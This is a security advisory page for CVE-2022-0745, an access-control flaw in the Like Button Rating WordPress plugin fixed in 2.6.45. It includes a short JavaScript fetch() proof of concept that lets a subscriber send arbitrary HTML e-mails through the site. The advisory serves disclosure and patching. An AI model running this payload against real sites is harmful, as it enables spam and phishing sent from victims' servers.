Like Button Rating < 2.6.45 – Arbitrary e-mail Sending | CVE 2022-0745 | Plugin Vulnerabilities

Description

The plugin allows any logged-in user, such as subscriber, to send arbitrary e-mails to any recipient, with any subject and body

Proof of Concept

As a subscriber, run the below command in the web developer console of the browser

fetch("/wp-admin/admin-ajax.php?action=likebtn_test_vote_notification", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "options[likebtn_notify_to]=recipient@example.com&options[likebtn_notify_subject]=hehehe&options[likebtn_notify_text]=Hopsasa</b><h1>",
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

likebtn-like-button

Fixed in 2.6.45

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

180f8e87-1463-43bb-a901-80031127723a

Timeline

Publicly Published

2022-05-23 (about 1 years ago)

Added

2022-05-23 (about 1 years ago)

Last Updated

2023-02-19 (about 1 years ago)

Other

Published

Title

Published

2024-01-17

Title

12 Step Meeting List < 3.14.29 - Subscriber+ CSV Download

Published

2023-09-06

Title

Duplicate Post Page Menu & Custom Post Type < 2.4.0 - Subscriber+ Post Duplication

Published

2024-03-29

Title

Layouts for Elementor < 1.8 - Missing Authorization to Unauthenticated Arbitrary File Upload

Published

2023-10-16

Title

Ashe Extra < 1.2.92 - Subscriber+ Companion Plugin Activation & Content Import

Published

2023-04-05

Title

YourChannel < 1.2.4 - Unauthenticated Settings Reset